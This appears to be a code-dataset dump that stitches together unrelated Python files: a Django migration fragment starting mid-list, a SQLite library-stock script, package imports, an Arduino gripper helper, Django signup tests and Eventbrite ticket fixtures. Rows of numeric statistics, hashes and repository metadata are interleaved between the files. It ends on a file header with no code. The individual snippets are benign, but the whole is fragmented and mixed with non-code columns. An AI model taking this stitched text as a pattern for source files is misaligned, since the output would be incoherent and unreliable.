        migrations.AddField(
            model_name='personinstitution',
            name='related_institution',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personinstitution_set', to='apis_entities.Institution'),
        ),
        migrations.AddField(
            model_name='personinstitution',
            name='related_person',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personinstitution_set', to='apis_entities.Person'),
        ),
        migrations.AddField(
            model_name='personinstitution',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personinstitution_set', to='apis_vocabularies.PersonInstitutionRelation'),
        ),
        migrations.AddField(
            model_name='personevent',
            name='related_event',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personevent_set', to='apis_entities.Event'),
        ),
        migrations.AddField(
            model_name='personevent',
            name='related_person',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personevent_set', to='apis_entities.Person'),
        ),
        migrations.AddField(
            model_name='personevent',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personevent_set', to='apis_vocabularies.PersonEventRelation'),
        ),
        migrations.AddField(
            model_name='institutionwork',
            name='related_institution',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionwork_set', to='apis_entities.Institution'),
        ),
        migrations.AddField(
            model_name='institutionwork',
            name='related_work',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionwork_set', to='apis_entities.Work'),
        ),
        migrations.AddField(
            model_name='institutionwork',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionwork_set', to='apis_vocabularies.InstitutionWorkRelation'),
        ),
        migrations.AddField(
            model_name='institutionplace',
            name='related_institution',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionplace_set', to='apis_entities.Institution'),
        ),
        migrations.AddField(
            model_name='institutionplace',
            name='related_place',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionplace_set', to='apis_entities.Place'),
        ),
        migrations.AddField(
            model_name='institutionplace',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionplace_set', to='apis_vocabularies.InstitutionPlaceRelation'),
        ),
        # Symmetric institution<->institution relation.
        migrations.AddField(
            model_name='institutioninstitution',
            name='related_institutionA',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_institutionB', to='apis_entities.Institution'),
        ),
        migrations.AddField(
            model_name='institutioninstitution',
            name='related_institutionB',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_institutionA', to='apis_entities.Institution'),
        ),
        migrations.AddField(
            model_name='institutioninstitution',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutioninstitution_set', to='apis_vocabularies.InstitutionInstitutionRelation'),
        ),
        migrations.AddField(
            model_name='institutionevent',
            name='related_event',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionevent_set', to='apis_entities.Event'),
        ),
        migrations.AddField(
            model_name='institutionevent',
            name='related_institution',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionevent_set', to='apis_entities.Institution'),
        ),
        migrations.AddField(
            model_name='institutionevent',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionevent_set', to='apis_vocabularies.InstitutionEventRelation'),
        ),
        migrations.AddField(
            model_name='eventwork',
            name='related_event',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventwork_set', to='apis_entities.Event'),
        ),
        migrations.AddField(
            model_name='eventwork',
            name='related_work',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventwork_set', to='apis_entities.Work'),
        ),
        migrations.AddField(
            model_name='eventwork',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventwork_set', to='apis_vocabularies.EventWorkRelation'),
        ),
        # Symmetric event<->event relation.
        migrations.AddField(
            model_name='eventevent',
            name='related_eventA',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_eventB', to='apis_entities.Event'),
        ),
        migrations.AddField(
            model_name='eventevent',
            name='related_eventB',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_eventA', to='apis_entities.Event'),
        ),
        migrations.AddField(
            model_name='eventevent',
            name='relation_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventevent_set', to='apis_vocabularies.EventEventRelation'),
        ),
    ]
| 54.307692
| 202
| 0.664935
| 1,335
| 12,708
| 6.130337
| 0.066667
| 0.043988
| 0.075269
| 0.11828
| 0.878055
| 0.878055
| 0.862903
| 0.771017
| 0.771017
| 0.689883
| 0
| 0.004
| 0.213015
| 12,708
| 233
| 203
| 54.540773
| 0.814319
| 0.00362
| 0
| 0.721239
| 1
| 0
| 0.243602
| 0.071406
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00885
| 0
| 0.026549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
997c4d98e9e71372a07cefc9aaf9e17cc6078c94
| 1,644
|
py
|
Python
|
Python_prAdd.py
|
shamikcodes-014/Library-Management-System
|
711a76c4a0bde7354882ca9d540e6b5fbda4404d
|
[
"MIT"
] | 1
|
2021-05-19T18:36:42.000Z
|
2021-05-19T18:36:42.000Z
|
Python_prAdd.py
|
shamikcodes-014/Library-Management-System
|
711a76c4a0bde7354882ca9d540e6b5fbda4404d
|
[
"MIT"
] | null | null | null |
Python_prAdd.py
|
shamikcodes-014/Library-Management-System
|
711a76c4a0bde7354882ca9d540e6b5fbda4404d
|
[
"MIT"
] | null | null | null |
def first():
    """(Re)initialize the library database and add the first book.

    Drops and recreates the Main table (destroying any existing stock),
    prompts the user for one book's details, inserts it, and prints the
    resulting stock table.

    Raises ValueError if the quantity entered is not an integer.
    """
    import sqlite3
    from tabulate import tabulate
    conn = sqlite3.connect('Library.sqlite')
    try:
        cur = conn.cursor()
        # Recreate the schema from scratch — this wipes existing data.
        cur.executescript('''
        DROP TABLE IF EXISTS Main;
        CREATE TABLE Main (
            Book_Name TEXT UNIQUE,
            Author TEXT,
            Quantity INTEGER,
            Book_id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE
        )
        ''')
        Book_name = input("Enter Book name to be added to stock ")
        Author_name = input("Enter the author name ")
        Quantity = int(input("Enter the quantity "))
        # Parameterized query: user input never goes into the SQL string.
        cur.execute('''INSERT INTO Main (Book_name, Author, Quantity) VALUES (?,?,?)''',
                    (Book_name, Author_name, Quantity))
        conn.commit()
        print("\nCurrent Stocks Present\n")
        cur.execute("SELECT Book_name, Author, Quantity FROM Main")
        myresult = cur.fetchall()
        print(tabulate(myresult, headers=['Book Name', 'Author', 'In Stock'], tablefmt='psql'))
    finally:
        # Fix: the connection was previously leaked (never closed).
        conn.close()
def normal():
    """Add one book to the existing library stock.

    Assumes the Main table already exists (created by first()). Prompts the
    user for the book's details, inserts it, and prints the updated stock.

    Raises ValueError if the quantity entered is not an integer, and
    sqlite3.IntegrityError if the book name already exists (UNIQUE column).
    """
    import sqlite3
    from tabulate import tabulate
    conn = sqlite3.connect('Library.sqlite')
    try:
        cur = conn.cursor()
        Book_name = input("Enter Book name to be added to stock ")
        Author_name = input("Enter the author name ")
        Quantity = int(input("Enter the quantity "))
        # Parameterized query: user input never goes into the SQL string.
        cur.execute('''INSERT INTO Main (Book_name, Author, Quantity) VALUES (?,?,?)''',
                    (Book_name, Author_name, Quantity))
        conn.commit()
        print("\nCurrent Stocks Present\n")
        cur.execute("SELECT Book_name, Author, Quantity FROM Main")
        myresult = cur.fetchall()
        print(tabulate(myresult, headers=['Book Name', 'Author', 'In Stock'], tablefmt='psql'))
    finally:
        # Fix: the connection was previously leaked (never closed).
        conn.close()
| 26.95082
| 121
| 0.630779
| 197
| 1,644
| 5.192893
| 0.294416
| 0.101662
| 0.109482
| 0.086022
| 0.84262
| 0.84262
| 0.84262
| 0.84262
| 0.84262
| 0.84262
| 0
| 0.003215
| 0.243309
| 1,644
| 60
| 122
| 27.4
| 0.819132
| 0
| 0
| 0.702703
| 0
| 0
| 0.455408
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.108108
| 0
| 0.162162
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5137b3415755637d0cf34e40565746d70e178f13
| 151
|
py
|
Python
|
quince/application/workflows/__init__.py
|
OATML/quince
|
913d45aa968355bd368c336e96100e1b540ca188
|
[
"Apache-2.0"
] | 16
|
2021-03-17T16:59:43.000Z
|
2022-03-21T00:45:57.000Z
|
quince/application/workflows/__init__.py
|
OATML/quince
|
913d45aa968355bd368c336e96100e1b540ca188
|
[
"Apache-2.0"
] | 1
|
2021-11-23T12:50:43.000Z
|
2021-11-23T12:50:43.000Z
|
quince/application/workflows/__init__.py
|
OATML/quince
|
913d45aa968355bd368c336e96100e1b540ca188
|
[
"Apache-2.0"
] | 3
|
2021-03-15T17:17:09.000Z
|
2021-06-18T02:56:11.000Z
|
from quince.application.workflows import tuning
from quince.application.workflows import training
from quince.application.workflows import evaluation
| 30.2
| 51
| 0.874172
| 18
| 151
| 7.333333
| 0.444444
| 0.227273
| 0.477273
| 0.681818
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086093
| 151
| 4
| 52
| 37.75
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
5158436f7f9d6c280e3a161240d36b0f0eafe5ee
| 232
|
py
|
Python
|
dcnn_visualizer/__init__.py
|
tochikuji/DNN-Visualizer
|
902eba04463c5c17ba81b85db7184a91d2cb4c49
|
[
"Apache-2.0"
] | 3
|
2018-02-09T07:21:36.000Z
|
2021-04-16T02:52:18.000Z
|
dcnn_visualizer/__init__.py
|
tochikuji/DNN-Visualizer
|
902eba04463c5c17ba81b85db7184a91d2cb4c49
|
[
"Apache-2.0"
] | 3
|
2018-01-11T05:47:02.000Z
|
2018-02-08T09:12:39.000Z
|
dcnn_visualizer/__init__.py
|
tochikuji/DNN-Visualizer
|
902eba04463c5c17ba81b85db7184a91d2cb4c49
|
[
"Apache-2.0"
] | null | null | null |
from dcnn_visualizer import tools
from dcnn_visualizer import visualizer
from dcnn_visualizer import occlusion
from dcnn_visualizer import traceable_chain
from dcnn_visualizer import traceable_nodes
from dcnn_visualizer import util
| 33.142857
| 43
| 0.896552
| 32
| 232
| 6.25
| 0.3125
| 0.24
| 0.54
| 0.72
| 0.33
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 232
| 6
| 44
| 38.666667
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
518bf7a57e4c32a31f4e78d3afc2c37735fa9605
| 239
|
py
|
Python
|
BARUS_CODE/BARUS_COMPUTER_CODE/Gripper.py
|
UdeS-GRO/S4H2019-BARUS
|
14bd4b45ccbd9f578fee7c72a7f754a85a0b8f6a
|
[
"MIT"
] | null | null | null |
BARUS_CODE/BARUS_COMPUTER_CODE/Gripper.py
|
UdeS-GRO/S4H2019-BARUS
|
14bd4b45ccbd9f578fee7c72a7f754a85a0b8f6a
|
[
"MIT"
] | 66
|
2019-01-16T17:24:19.000Z
|
2019-04-09T00:37:14.000Z
|
BARUS_CODE/BARUS_COMPUTER_CODE/Gripper.py
|
UdeS-GRO/S4H2019-BARUS
|
14bd4b45ccbd9f578fee7c72a7f754a85a0b8f6a
|
[
"MIT"
] | 2
|
2019-01-16T16:34:51.000Z
|
2020-01-08T19:25:20.000Z
|
import SerialCom
import Constant
def closeGripper():
    """Send the close-gripper command to the Arduino over the serial link.

    Sends the device selector Constant.GRIPPER and the command
    Constant.GRIPPER_CLOSE as a two-int message via SerialCom.
    """
    SerialCom.send2IntToArduino(Constant.GRIPPER, Constant.GRIPPER_CLOSE)
def openGripper():
    """Send the open-gripper command to the Arduino over the serial link.

    Sends the device selector Constant.GRIPPER and the command
    Constant.GRIPPER_OPEN as a two-int message via SerialCom.
    """
    SerialCom.send2IntToArduino(Constant.GRIPPER, Constant.GRIPPER_OPEN)
| 17.071429
| 74
| 0.757322
| 22
| 239
| 8.136364
| 0.454545
| 0.335196
| 0.379888
| 0.458101
| 0.625698
| 0.625698
| 0
| 0
| 0
| 0
| 0
| 0.01005
| 0.167364
| 239
| 13
| 75
| 18.384615
| 0.889447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
51a217cf4fa4270a5a7a06366de91670abb2959e
| 1,242
|
py
|
Python
|
tests/base/tests.py
|
BoyanPeychinov/farm_food_project
|
1cac80194bb8563b0f1926685a540e3162f43e82
|
[
"MIT"
] | null | null | null |
tests/base/tests.py
|
BoyanPeychinov/farm_food_project
|
1cac80194bb8563b0f1926685a540e3162f43e82
|
[
"MIT"
] | null | null | null |
tests/base/tests.py
|
BoyanPeychinov/farm_food_project
|
1cac80194bb8563b0f1926685a540e3162f43e82
|
[
"MIT"
] | null | null | null |
import datetime
from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.urls import reverse
# Resolve the active user model once at import time so the test cases below
# work with a custom AUTH_USER_MODEL as well as the default.
UserModel = get_user_model()
class ProducerProfileTestCase(TestCase):
    """Base fixture: signs up a producer account and loads the created user."""

    user_email = 'test_user@abv.bg'
    user_password = 'dasd7as!><2bdsa12347a@4=}{'
    name = 'Gosho'

    def setUp(self):
        self.client = Client()
        signup_payload = {
            'email': self.user_email,
            'password1': self.user_password,
            'password2': self.user_password,
            'user_type': 'is_producer',
            'name': self.name,
        }
        self.client.post(reverse('sign up'), data=signup_payload)
        # The sign-up view creates the user; fetch it for use in subclasses.
        self.user = UserModel.objects.get(email=self.user_email)
class ConsumerProfileTestCase(TestCase):
    """Base fixture: signs up a customer account and loads the created user."""

    user_email = 'test_user@abv.bg'
    user_password = 'dasd7as!><2bdsa12347a@4=}{'
    name = 'Gosho'

    def setUp(self):
        self.client = Client()
        signup_payload = {
            'email': self.user_email,
            'password1': self.user_password,
            'password2': self.user_password,
            'user_type': 'is_customer',
            'name': self.name,
        }
        self.client.post(reverse('sign up'), data=signup_payload)
        # The sign-up view creates the user; fetch it for use in subclasses.
        self.user = UserModel.objects.get(email=self.user_email)
| 27.6
| 64
| 0.612721
| 139
| 1,242
| 5.330935
| 0.294964
| 0.08637
| 0.102564
| 0.097166
| 0.720648
| 0.720648
| 0.720648
| 0.720648
| 0.720648
| 0.720648
| 0
| 0.038668
| 0.250403
| 1,242
| 45
| 65
| 27.6
| 0.75725
| 0
| 0
| 0.727273
| 0
| 0
| 0.204344
| 0.083669
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0.181818
| 0.121212
| 0
| 0.424242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
51b3ba46d06d4259ed71ada3bcca4dcbe34d14fb
| 236
|
py
|
Python
|
bolinette/defaults/services/__init__.py
|
bolinette/bolinette
|
b35a7d828c7d9617da6a8d7ac066e3b675a65252
|
[
"MIT"
] | 4
|
2020-11-02T15:16:32.000Z
|
2022-01-11T11:19:24.000Z
|
bolinette/defaults/services/__init__.py
|
bolinette/bolinette
|
b35a7d828c7d9617da6a8d7ac066e3b675a65252
|
[
"MIT"
] | 14
|
2021-01-04T11:06:59.000Z
|
2022-03-23T17:01:49.000Z
|
bolinette/defaults/services/__init__.py
|
bolinette/bolinette
|
b35a7d828c7d9617da6a8d7ac066e3b675a65252
|
[
"MIT"
] | null | null | null |
from bolinette.defaults.services.timezone import TimezoneService
from bolinette.defaults.services.file import FileService
from bolinette.defaults.services.role import RoleService
from bolinette.defaults.services.user import UserService
| 47.2
| 64
| 0.881356
| 28
| 236
| 7.428571
| 0.464286
| 0.25
| 0.403846
| 0.557692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 236
| 4
| 65
| 59
| 0.945455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
cff29a2155def61d652f6483bae5a88751542994
| 12,179
|
py
|
Python
|
tests/ticketing/eb_ticket_list.py
|
bethlakshmi/gbe-divio-djangocms-python2.7
|
6e9b2c894162524bbbaaf73dcbe927988707231d
|
[
"Apache-2.0"
] | 1
|
2021-03-14T11:56:47.000Z
|
2021-03-14T11:56:47.000Z
|
tests/ticketing/eb_ticket_list.py
|
bethlakshmi/gbe-divio-djangocms-python2.7
|
6e9b2c894162524bbbaaf73dcbe927988707231d
|
[
"Apache-2.0"
] | 180
|
2019-09-15T19:52:46.000Z
|
2021-11-06T23:48:01.000Z
|
tests/ticketing/eb_ticket_list.py
|
bethlakshmi/gbe-divio-djangocms-python2.7
|
6e9b2c894162524bbbaaf73dcbe927988707231d
|
[
"Apache-2.0"
] | null | null | null |
# Canned Eventbrite ticket_classes API response used as a test fixture:
# event "12122222111111" with one paid "Regular Price" ticket and one
# hidden free ticket.
ticket_dict1 = {
    "pagination": {
        "object_count": 2,
        "continuation": None,
        "page_count": 1,
        "page_size": 50,
        "has_more_items": False,
        "page_number": 1
    },
    "ticket_classes": [
        # Paid ticket: $100.00 + $7.72 fee, quantity 300, visible.
        {
            "actual_cost": None,
            "actual_fee": {
                "display": "$7.72",
                "currency": "USD",
                "value": 772,
                "major_value": "7.72"
            },
            "cost": {
                "display": "$100.00",
                "currency": "USD",
                "value": 10000,
                "major_value": "100.00"
            },
            "fee": {
                "display": "$7.72",
                "currency": "USD",
                "value": 772,
                "major_value": "7.72"
            },
            "tax": {
                "display": "$0.00",
                "currency": "USD",
                "value": 0,
                "major_value": "0.00"
            },
            "resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/567567567/",
            "display_name": "Regular Price",
            "name": "Regular Price",
            "description": None,
            "sorting": 1,
            "donation": False,
            "free": False,
            "minimum_quantity": 1,
            "maximum_quantity": 10,
            "maximum_quantity_per_order": 10,
            "on_sale_status": "AVAILABLE",
            "has_pdf_ticket": True,
            "order_confirmation_message": None,
            "delivery_methods": [
                "electronic"
            ],
            "category": "admission",
            "sales_channels": [
                "online",
                "atd"
            ],
            "secondary_assignment_enabled": False,
            "event_id": "12122222111111",
            "image_id": None,
            "id": "278648077",
            "capacity": 300,
            "quantity_total": 300,
            "quantity_sold": 0,
            "sales_start": "2021-06-02T04:00:00Z",
            "sales_end": "2021-09-03T19:00:00Z",
            "sales_end_relative": None,
            "hidden": False,
            "hidden_currently": False,
            "include_fee": False,
            "split_fee": False,
            "hide_description": True,
            "hide_sale_dates": False,
            "auto_hide": False,
            "payment_constraints": []
        },
        # Free ticket: no cost/fee blocks, quantity 50, hidden.
        {
            "actual_cost": None,
            "actual_fee": None,
            "cost": None,
            "fee": None,
            "tax": None,
            "resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/678678678/",
            "display_name": "Super Special Free Admission",
            "name": "Super Special Free Admission",
            "description": None,
            "sorting": 2,
            "donation": False,
            "free": True,
            "minimum_quantity": 1,
            "maximum_quantity": 1,
            "maximum_quantity_per_order": 1,
            "on_sale_status": "AVAILABLE",
            "has_pdf_ticket": True,
            "order_confirmation_message": None,
            "delivery_methods": [
                "electronic"
            ],
            "category": "admission",
            "sales_channels": [
                "online",
                "atd"
            ],
            "secondary_assignment_enabled": False,
            "event_id": "12122222111111",
            "image_id": None,
            "id": "278648079",
            "capacity": 50,
            "quantity_total": 50,
            "quantity_sold": 0,
            "sales_start": "2021-06-02T04:00:00Z",
            "sales_end": "2021-09-03T19:00:00Z",
            "sales_end_relative": None,
            "hidden": True,
            "hidden_currently": True,
            "include_fee": False,
            "split_fee": False,
            "hide_description": True,
            "hide_sale_dates": False,
            "auto_hide": False,
            "payment_constraints": []
        }
    ]
}
# Fixture: a mocked Eventbrite-style /ticket_classes response (one paid class,
# one hidden free class) for event "2222333332323232".
ticket_dict2 = {
    "pagination": {
        "object_count": 2,
        "continuation": None,
        "page_count": 1,
        "page_size": 50,
        "has_more_items": False,
        "page_number": 1,
    },
    "ticket_classes": [
        {
            "actual_cost": None,
            "actual_fee": {"display": "$7.72", "currency": "USD", "value": 772, "major_value": "7.72"},
            "cost": {"display": "$100.00", "currency": "USD", "value": 10000, "major_value": "100.00"},
            "fee": {"display": "$7.72", "currency": "USD", "value": 772, "major_value": "7.72"},
            "tax": {"display": "$0.00", "currency": "USD", "value": 0, "major_value": "0.00"},
            "resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/3255985/",
            "display_name": "Regular Price",
            "name": "Regular Price",
            "description": None,
            "sorting": 1,
            "donation": False,
            "free": False,
            "minimum_quantity": 1,
            "maximum_quantity": 10,
            "maximum_quantity_per_order": 10,
            "on_sale_status": "AVAILABLE",
            "has_pdf_ticket": True,
            "order_confirmation_message": None,
            "delivery_methods": ["electronic"],
            "category": "admission",
            "sales_channels": ["online", "atd"],
            "secondary_assignment_enabled": False,
            "event_id": "2222333332323232",
            "image_id": None,
            "id": "278648077",
            "capacity": 300,
            "quantity_total": 300,
            "quantity_sold": 0,
            "sales_start": "2021-06-02T04:00:00Z",
            "sales_end": "2021-09-03T19:00:00Z",
            "sales_end_relative": None,
            "hidden": False,
            "hidden_currently": False,
            "include_fee": False,
            "split_fee": False,
            "hide_description": True,
            "hide_sale_dates": False,
            "auto_hide": False,
            "payment_constraints": [],
        },
        {
            "actual_cost": None,
            "actual_fee": None,
            "cost": None,
            "fee": None,
            "tax": None,
            "resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/890890890/",
            "display_name": "Super Special Free Admission",
            "name": "Super Special Free Admission",
            "description": None,
            "sorting": 2,
            "donation": False,
            "free": True,
            "minimum_quantity": 1,
            "maximum_quantity": 1,
            "maximum_quantity_per_order": 1,
            "on_sale_status": "AVAILABLE",
            "has_pdf_ticket": True,
            "order_confirmation_message": None,
            "delivery_methods": ["electronic"],
            "category": "admission",
            "sales_channels": ["online", "atd"],
            "secondary_assignment_enabled": False,
            "event_id": "2222333332323232",
            "image_id": None,
            "id": "278648079",
            "capacity": 50,
            "quantity_total": 50,
            "quantity_sold": 0,
            "sales_start": "2021-06-02T04:00:00Z",
            "sales_end": "2021-09-03T19:00:00Z",
            "sales_end_relative": None,
            "hidden": True,
            "hidden_currently": True,
            "include_fee": False,
            "split_fee": False,
            "hide_description": True,
            "hide_sale_dates": False,
            "auto_hide": False,
            "payment_constraints": [],
        },
    ],
}
# Fixture: a mocked Eventbrite-style /ticket_classes response (one paid class,
# one hidden free class) for event "44454545454545454".
ticket_dict3 = {
    "pagination": {
        "object_count": 2,
        "continuation": None,
        "page_count": 1,
        "page_size": 50,
        "has_more_items": False,
        "page_number": 1,
    },
    "ticket_classes": [
        {
            "actual_cost": None,
            "actual_fee": {"display": "$7.72", "currency": "USD", "value": 772, "major_value": "7.72"},
            "cost": {"display": "$100.00", "currency": "USD", "value": 10000, "major_value": "100.00"},
            "fee": {"display": "$7.72", "currency": "USD", "value": 772, "major_value": "7.72"},
            "tax": {"display": "$0.00", "currency": "USD", "value": 0, "major_value": "0.00"},
            "resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/098098098/",
            "display_name": "Regular Price",
            "name": "Regular Price",
            "description": None,
            "sorting": 1,
            "donation": False,
            "free": False,
            "minimum_quantity": 1,
            "maximum_quantity": 10,
            "maximum_quantity_per_order": 10,
            "on_sale_status": "AVAILABLE",
            "has_pdf_ticket": True,
            "order_confirmation_message": None,
            "delivery_methods": ["electronic"],
            "category": "admission",
            "sales_channels": ["online", "atd"],
            "secondary_assignment_enabled": False,
            "event_id": "44454545454545454",
            "image_id": None,
            "id": "278648077",
            "capacity": 300,
            "quantity_total": 300,
            "quantity_sold": 0,
            "sales_start": "2021-06-02T04:00:00Z",
            "sales_end": "2021-09-03T19:00:00Z",
            "sales_end_relative": None,
            "hidden": False,
            "hidden_currently": False,
            "include_fee": False,
            "split_fee": False,
            "hide_description": True,
            "hide_sale_dates": False,
            "auto_hide": False,
            "payment_constraints": [],
        },
        {
            "actual_cost": None,
            "actual_fee": None,
            "cost": None,
            "fee": None,
            "tax": None,
            "resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/987987987/",
            "display_name": "Super Special Free Admission",
            "name": "Super Special Free Admission",
            "description": None,
            "sorting": 2,
            "donation": False,
            "free": True,
            "minimum_quantity": 1,
            "maximum_quantity": 1,
            "maximum_quantity_per_order": 1,
            "on_sale_status": "AVAILABLE",
            "has_pdf_ticket": True,
            "order_confirmation_message": None,
            "delivery_methods": ["electronic"],
            "category": "admission",
            "sales_channels": ["online", "atd"],
            "secondary_assignment_enabled": False,
            "event_id": "44454545454545454",
            "image_id": None,
            "id": "278648079",
            "capacity": 50,
            "quantity_total": 50,
            "quantity_sold": 0,
            "sales_start": "2021-06-02T04:00:00Z",
            "sales_end": "2021-09-03T19:00:00Z",
            "sales_end_relative": None,
            "hidden": True,
            "hidden_currently": True,
            "include_fee": False,
            "split_fee": False,
            "hide_description": True,
            "hide_sale_dates": False,
            "auto_hide": False,
            "payment_constraints": [],
        },
    ],
}
| 32.651475
| 109
| 0.440348
| 993
| 12,179
| 5.147029
| 0.116818
| 0.007044
| 0.037566
| 0.030522
| 0.985717
| 0.985717
| 0.985717
| 0.985717
| 0.985717
| 0.985717
| 0
| 0.092448
| 0.422695
| 12,179
| 372
| 110
| 32.739247
| 0.634476
| 0
| 0
| 0.887097
| 0
| 0
| 0.40069
| 0.039412
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c80bb3ed2f47ea55e7f69b66744eace9ba2ba38
| 17,757
|
py
|
Python
|
v0/aia_eis_v0/goa/human_based/harmony_search/hs_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | 1
|
2022-03-02T12:57:19.000Z
|
2022-03-02T12:57:19.000Z
|
v0/aia_eis_v0/goa/human_based/harmony_search/hs_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | null | null | null |
v0/aia_eis_v0/goa/human_based/harmony_search/hs_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
